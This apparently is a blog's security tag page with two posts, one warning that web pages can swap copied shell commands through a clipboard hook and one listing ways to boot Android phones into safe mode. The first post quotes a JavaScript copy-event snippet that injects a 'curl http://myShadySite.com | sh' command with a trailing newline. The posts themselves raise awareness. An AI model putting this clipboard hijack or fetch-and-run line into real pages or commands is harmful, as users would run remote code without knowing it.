Tag Archives: Security

Copying shell commands from websites

There are quite a few websites – like Homebrew, for instance – that offer initial installation in a form of shell script that downloads installation binary and runs it (or does some other actions like saving specific values to a configuration file). I always had some vague concern about copying and running commands, but then again, you could read those commands and judge for yourself if they’re malicious or not, right? Yes, but…

I stumbled upon an article today that highlighted how the copied code could be not what it seems – or rather, it’d replace copied text with something else: https://briantracy.xyz/writing/copy-paste-shell.html

It’s quite ingenious, really – it hooks onto copy event and it replaces clipboard data with another command, that’d even have a newline at the end so it’d launch after you paste it automatically. Here’s the code from the article:

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    e.preventDefault();
});

Now, you need to land on a frankly malicious website that’d do such a trick to you, but there also might be an XSS on an honest website that could utilise that. One way to safeguard yourself would be check your clipboard content (I use Alfred for OSX, it has an amazing feature of clipboard history), or paste the copied data in text editor or any non-shell text field to validate it’s what you expect it to be.

Live and learn!

Android safe mode

This is merely a partial copy of this article: http://nakedsecurity.sophos.com/2014/05/19/first-aid-for-android-how-to-unlock-your-ransomed-phone/ – for more detailed reference of what to do in safe mode and why use it, read that one. This gist is “to keep around if need arises”:

Method 1

(Reported to work on Google devices and various Android Open Source Project, or AOSP, derivatives like CyanogenMod.)

  • Press and hold the power button as you would to power down or reboot.
  • A menu will pop up.
  • Tap and hold the “Power off” option.
  • If nothing happens try the same with “Reboot”.
  • A dialog should appear offering you to reboot in Safe Mode.

Method 2

(Reported to work on Samsung Galaxy S4.)

  • Power down.
  • Turn on and repeatedly tap the soft-button for “Menu.”

Method 3

(Reported to work on Samsung Galaxy S3 and others)

  • Power down.
  • Turn on, then press and hold Volume Down (Galaxy S3 and others), Volume Up (HTC One and others), or Volume Down and Volume Up together (various Motorola devices) when the vendor’s logo appears.

If you have managed to select Safe Mode, you will see the text “Safe Mode” at the bottom left corner of the screen.

To get out of Safe Mode, try simply rebooting.

If that doesn’t work, try rebooting using one of the button-press options listed above, starting with the one you used to engage Safe Mode in the first place.